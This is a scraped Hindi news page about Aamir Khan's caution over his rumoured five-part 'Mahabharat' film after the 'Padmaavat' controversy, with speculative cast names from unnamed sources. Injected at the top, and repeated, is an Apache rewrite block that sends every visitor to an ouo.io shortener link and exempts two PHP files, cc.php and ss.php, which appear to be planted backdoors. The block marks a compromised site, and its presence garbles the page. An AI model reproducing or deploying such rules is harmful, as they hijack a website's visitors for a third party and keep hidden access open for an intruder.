
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 595
Previous Nextनई दिल्ली। आजकल ऐतिहासिक तत्थों पर आधारित फिल्में आने से पहले ही कंट्रोवर्सी में उलझ जाती हैं। जिसका खामिया बहुत ही बुरा होता है। शायद यही वजह है कि बॉलीवुड निर्माता- निर्देशक अब कोई रिस्क नहीं लेना चाहते हैं। इसी लिस्ट में बॉलीवुड के मिस्टर परफेक्शनिस्ट आमिर खान का भी नाम सामने आया है। कहा जा रहा है आमिर अपने ड्रीम प्रोजेक्ट 'महाभारत' को लेकर काफी सर्तक हैं। दरअसल, आमिर खान 2018 में रिलीज फिल्म पद्मावत पर हुए विवाद को लेकर काफी चिंतित है। लगभग 1000 करोड़ रुपये की लागत से बन रही फिल्म 'महाभारत' में कोई भी रिस्क लेने से बच रहे हैं। एक न्यूज साइट ने दावा किया है कि आमिर अपने इस प्रोजेक्ट पर रोक लगा सकते हैं। सूत्रों की मानें तो आमिर इस फिल्म की सभी बारिकियों पर काफी ध्यान देना चाहते हैं ताकि कोई कंट्रोवर्सी न हो। बता दें कि पिछले कुछ दिनों से फिल्म महाभारत काफी चर्चे में हैं। यह फिल्म ऐतिहासिक तथ्यों पर आधारित है। जो 5 भागों में रिलीज होगी। हालांकि महाभारत कब रिलीज होगी, कौन एक्टर और एक्ट्रेस इस फिल्म में काम करेंगे इस बारे में कोई अधिकारिक सूचना नहीं हैं। लेकिन सूत्रों के अनुसार इस फिल्म में अमिताभ बच्चन, अजय देवगन, रजनीकांत, रणवीर सिंह, अभिषेक बच्चन और प्रभास के नाम शामिल हैं। मुख्य भूमिकाओं में आमिर खान, सलमान खान, और शाहरुख खान रहेंगे।